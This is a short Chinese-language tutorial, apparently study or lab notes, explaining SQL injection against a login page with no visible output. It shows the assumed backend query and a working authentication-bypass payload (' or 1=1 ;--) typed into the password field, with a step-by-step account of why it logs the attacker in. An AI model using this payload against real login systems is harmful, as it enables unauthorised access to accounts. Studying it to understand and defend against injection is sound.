Blind SQLi
SQL盲注
sql盲注用于一些我们看不到回显的登陆页面,我们得到很少甚至没有反馈来确认注入的查询是否真的成功,这是因为错误消息已被禁用,但是无论如何SQL注入仍然有效。
当我们看到这样的页面
而且url中没有?时,这种实际上相当于:
select * from users where username='%username%' and password='%password%' LIMIT 1;
这时我们可以尝试绕过身份验证
在Username下输入admin,在Password下输入 ’ or 1=1 ;--
这相当于:
select * from users where username='admin' and password='' or 1=1 ;--' LIMIT 1;
等于
select * from users where username='admin' and password='' or 1=1;
因为 1=1 是一个真正的陈述,并且我们使用了 OR 运算符, 这将始终导致查询返回为 true,这满足 数据库发现有效的 Web 应用程序逻辑 用户名/密码组合,并且应允许该访问。
最终我们便绕过了身份验证并登录